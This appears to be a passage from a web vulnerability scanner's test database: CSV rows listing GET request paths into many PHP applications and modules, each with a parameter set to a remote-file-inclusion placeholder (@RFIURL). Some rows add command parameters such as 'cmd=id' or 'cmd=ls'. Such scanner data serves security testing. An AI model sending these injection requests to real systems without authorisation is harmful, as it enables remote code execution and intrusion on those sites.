"005416","5292","c","/modules/horoscope/footer.php?xoopsConfig[root_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005417","5292","c","/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005418","5292","c","/modules/info/index.php?full_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005419","5292","c","/modules/links/blocks/links.php?system[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005420","5292","c","/modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005421","5292","c","/modules/links/submit_links.php?rootdp=zZz&gsLanguage=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005422","5292","c","/modules/log/index.php?full_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005423","5292","c","/modules/mail/index.php?full_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005424","5292","c","/modules/menu/headerfile.php?system[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005425","5292","c","/modules/messages/index.php?full_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005426","5292","c","/modules/mod_as_category.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005427","5292","c","/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005428","5292","c","/modules/mod_calendar.php?absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005429","5292","c","/modules/mod_flatmenu.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005430","5292","c","/modules/mod_mainmenu.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005431","5292","c","/modules/mod_weather.php?absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005432","5292","c","/modules/mod_weather.php?absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005433","5292","c","/modules/mx_smartor/admin/admin_album_otf.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005434","5292","c","/modules/mx_smartor/admin/admin_album_otf.php?phpbb_root_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005435","5292","c","/modules/newbb_plus/config.php?bbPath[root_theme]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005436","5292","c","/modules/newbb_plus/votepolls.php?bbPath[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005437","5292","c","/modules/news/blocks/latest_news.php?system[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005438","5292","c","/modules/newusergreatings/pm_newreg.php?exbb[home_path]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005439","5292","c","/modules/organizations/index.php?full_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005440","5292","c","/modules/phones/index.php?full_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005441","5292","c","/modules/pms/index.php?module_path=@RFIURL???","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005442","5292","c","/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005443","5292","c","/modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005444","5292","c","/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005445","5292","c","/modules/presence/index.php?full_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005446","5292","c","/modules/projects/index.php?full_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005447","5292","c","/modules/projects/list.php?full_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005448","5292","c","/modules/projects/summary.inc.php?full_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005449","5292","c","/modules/punish/p_error.php?exbb[home_path]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005450","5292","c","/modules/punish/profile.php?exbb[home_path]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005451","5292","c","/modules/reports/index.php?full_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005452","5292","c","/modules/search/index.php?full_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005453","5292","c","/modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005454","5292","c","/modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005455","5292","c","/modules/settings/headerfile.php?system[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005456","5292","c","/modules/snf/index.php?full_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005457","5292","c","/modules/syslog/index.php?full_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005458","5292","c","/modules/tasks/index.php?full_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005459","5292","c","/modules/tasks/searchsimilar.php?full_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005460","5292","c","/modules/tasks/summary.inc.php?full_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005461","5292","c","/modules/threadstop/threadstop.php?exbb[home_path]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005462","5292","c","/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005463","5292","c","/modules/tml/block.tag.php?GLOBALS[PTH][classes]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005464","5292","c","/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005465","5292","c","/modules/useradm/index.php?full_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005466","5292","c","/modules/users/headerfile.php?system[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005467","5292","c","/modules/vWar_Account/includes/functions_common.php?vwar_root2=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005468","5292","c","/modules/visitors2/include/config.inc.php?lvc_include_dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005469","5292","c","/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005470","5292","c","/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005471","5292","c","/modules/xfsection/modify.php?dir_module=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005472","5292","c","/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005473","5292","c","/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005474","5292","c","/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005475","5292","c","/modulistica/mdl_save.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005476","5292","c","/modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005477","5292","c","/moodle/admin/utfdbmigrate.php?cmd=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005478","5292","c","/moosegallery/display.php?type=@RFIURL?&cmd=[command]","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005479","5292","c","/mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005480","5292","c","/moteur/moteur.php?chemin=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005481","5292","c","/movie_cls.php?full_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005482","5292","c","/msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005483","5292","c","/music/buycd.php?HTTP_DOCUMENT_ROOT=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005484","5292","c","/mutant_includes/mutant_functions.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005485","5292","c","/mxBB/modules/kb_mods/includes/kb_constants.php?module_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005486","5292","c","/mxBB/modules/mx_newssuite/includes/newssuite_constants.php?mx_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005487","5292","c","/mygallery/myfunctions/mygallerybrowser.php?myPath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005488","5292","c","/myphpcommander_path/system/lib/package.php?gl_root=@RFIURL?cmd","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005489","5292","c","/mysave.php?file=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005490","5292","c","/naboard_pnr.php?skin=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005491","5292","c","/ncaster/admin/addons/archive/archive.php?adminfolder=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005492","5292","c","/network_module_selector.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005493","5292","c","/news.php?CONFIG[script_path]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005494","5292","c","/news.php?config[root_ordner]=@RFIURL?&cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005495","5292","c","/news.php?scriptpath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005496","5292","c","/news.php?vwar_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005497","5292","c","/news.php?vwar_root=@RFIURL?&cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005498","5292","c","/news/include/createdb.php?langfile;=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005499","5292","c","/news/include/customize.php?l=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005500","5292","c","/news/newstopic_inc.php?indir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005501","5292","c","/news/scripts/news_page.php?script_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005502","5292","c","/newsadmin.php?action=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005503","5292","c","/newsarchive.php?path_to_script=@RFIURL?&cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005504","5292","c","/newsfeeds/includes/aggregator.php?zf_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005505","5292","c","/newsfeeds/includes/controller.php?zf_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005506","5292","c","/newsletter/newsletter.php?waroot=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005507","5292","c","/newsp/lib/class.Database.php?path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005508","5292","c","/newticket.php?lang=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005509","5292","c","/noah/modules/noevents/templates/mfa_theme.php?tpls[1]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005510","5292","c","/noticias.php?inc=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005511","5292","c","/nucleus/plugins/skinfiles/index.php?DIR_LIBS=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005512","5292","c","/nuke_path/iframe.php?file=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005513","5292","c","/nukebrowser.php?filnavn=@RFIURL&filhead=XXpathXX&cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005514","5292","c","/nuseo/admin/nuseo_admin_d.php?nuseo_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005515","5292","c","/nuseo/admin/nuseo_admin_d.php?nuseo_dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005516","5292","c","/oaboard_en/forum.php?inc=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005517","5292","c","/ocp-103/index.php?req_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005518","5292","c","/ocs/include/footer.inc.php?fullpath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005519","5292","c","/ocs/include/theme.inc.php?fullpath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005520","5292","c","/ocs/openemr-2.8.2/custom/import_xml.php?srcdir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005521","5292","c","/olbookmarks-0.7.4/themes/test1.php?@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005522","5292","c","/oneadmin/adminfoot.php?path[docroot]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005523","5292","c","/oneadmin/blogger/sampleblogger.php?path[docroot]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005524","5292","c","/oneadmin/config-bak.php?include_once=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005525","5292","c","/oneadmin/config.php?path[docroot]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005526","5292","c","/oneadmin/ecommerce/sampleecommerce.php?path[docroot]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005527","5292","c","/online.php?config[root_ordner]=@RFIURL?&cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005528","5292","c","/open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005529","5292","c","/openi-admin/base/fileloader.php?config[openi_dir]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005530","5292","c","/openrat/themes/default/include/html/insert.inc.php?tpl_dir=@RFIURL???","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005531","5292","c","/opensurveypilot/administration/user/lib/group.inc.php?cfgPathToProjectAdmin=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005532","5292","c","/ops/gals.php?news_file=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005533","5292","c","/order/login.php?svr_rootscript=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005534","5292","c","/osData/php121/php121db.php?php121dir=@RFIURL%00","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005535","5292","c","/ossigeno-suite-2.2_pre1/upload/xax/admin/modules/uninstall_module.php?level=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005536","5292","c","/ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005537","5292","c","/owimg.php3?path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005538","5292","c","/p-news.php?pn_lang=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005539","5292","c","/pafiledb/includes/pafiledb_constants.php?module_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005540","5292","c","/page.php?goto=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005541","5292","c","/page.php?id=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005542","5292","c","/panel/common/theme/default/header_setup.php?path[docroot]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005543","5292","c","/param_editor.php?folder=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005544","5292","c","/parse/parser.php?WN_BASEDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005545","5292","c","/patch/?language_id=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005546","5292","c","/patch/tools/send_reminders.php?noSet=0&includedir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005547","5292","c","/paypalipn/ipnprocess.php?INC=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005548","5292","c","/pda/pda_projects.php?offset=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005549","5292","c","/phfito/phfito-post?SRC_PATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005550","5292","c","/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005551","5292","c","/photo_comment.php?toroot=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005552","5292","c","/php-inc/log.inc.php?SKIN_URL=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005553","5292","c","/php-include-robotsservices.php?page=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005554","5292","c","/php-nuke/modules/Forums/admin/admin_styles.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005555","5292","c","/php.incs/common.inc.php?cm_basedir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005556","5292","c","/php/init.gallery.php?include_class=@RFIURL/something","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005557","5292","c","/php121db.php?php121dir=@RFIURL%00","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005558","5292","c","/php4you.php?dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005559","5292","c","/phpAdsNew-2.0.7/libraries/lib-remotehost.inc?phpAds_geoPlugin=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005560","5292","c","/phpBB2/shoutbox.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005561","5292","c","/phpCards.header.php?CardPath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005562","5292","c","/phpGedView/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
